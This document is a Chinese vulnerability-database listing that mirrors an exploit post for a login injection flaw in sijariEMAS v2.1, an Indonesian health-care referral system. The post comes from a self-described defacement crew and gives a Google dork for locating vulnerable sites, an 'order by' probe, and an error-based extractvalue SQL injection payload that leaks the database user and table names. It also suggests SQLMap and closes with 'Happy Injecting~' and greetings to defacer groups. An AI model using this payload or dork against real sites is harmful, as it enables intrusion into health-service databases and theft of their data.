sijariEMAS v2.1 Login Xpath Injection Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1464808 漏洞类型
发布时间 2019-01-31 更新时间 2019-01-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019010309
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[+]Exploit Title: sijariEMAS v2.1 Login Xpath Injection Vulnerability 
[+]Author: ./Sn00py 
[+]Team: Indonesian Code Party
[+]Goolge Dork: "Intext:Sistem Informasi dan Komunikasi Jejaring Rujukan Pelayanan Kesehatan"
[+]Tested on: Linux Parrot 
[+]Vendor: http://sijariemas.net/ 
======================================= 
[+]Proof Of Concept: FFirst, you have to find out whether the site has a login feature and if you enter the string there will be no error, but if you continue with 'order by 100-- it will appear' Unknown column '100' in 'order clause' Then that vulnerable to SQL-Injection attacks.

[+]Exploit:
' and extractvalue(0x0a,concat(0x0a,user(),0x0a,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))-- - 
You can use SQLMap or do a manual injection using Xpath Injection to get the web database

[+]Demo? No Demo ^^ Happy Injecting~ 

Greetz: Khatulistiwa - DarkOct02 - Indonesian Code Party - RSFLT - N45HT - PacmanCorp - AllindonesiaDefacer